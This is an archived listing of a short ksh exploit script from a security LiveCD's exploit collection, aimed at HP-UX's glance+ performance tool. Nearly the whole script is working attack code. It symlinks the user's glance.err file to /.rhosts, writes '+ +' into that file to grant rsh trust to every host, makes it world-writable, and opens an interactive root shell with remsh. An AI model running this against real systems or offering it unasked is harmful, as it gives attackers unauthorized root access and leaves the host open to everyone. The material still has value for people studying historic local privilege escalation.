home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / glance.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  868b  |  31 lines

  1. #!/bin/ksh
  2. #
  3. # exploit to work against the latest rev that I know of for glance+
  4. # Tested on 9000/700.. Don't even know if it's available on 10.X
  5. # You could've done this next week.  .traz
  6.  
  7. if [ ! -x /usr/perf/bin/glance ]
  8. then
  9.   echo 'No diablo programme.'
  10.   echo 'Que si como es que.'
  11.   exit
  12. fi
  13.  
  14. PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
  15. echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
  16. sleep 3
  17. cp /.rhosts /tmp/rhosts-save
  18. ln -s /.rhosts ~/glance.err
  19. glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
  20. echo '+ +' > /.rhosts
  21. if [ -f /tmp/rhosts-save ]
  22. then
  23.   cat /tmp/rhosts-save >> /.rhosts
  24.   rm /tmp/rhosts-save
  25. fi
  26. #rm ~/glance.err # This goes away?  Why does this go away?
  27. chmod 666 /.rhosts
  28. chown root /.rhosts
  29. remsh localhost -l root /bin/ksh -i
  30.  
  31. #                 www.hack.co.za           [2000]#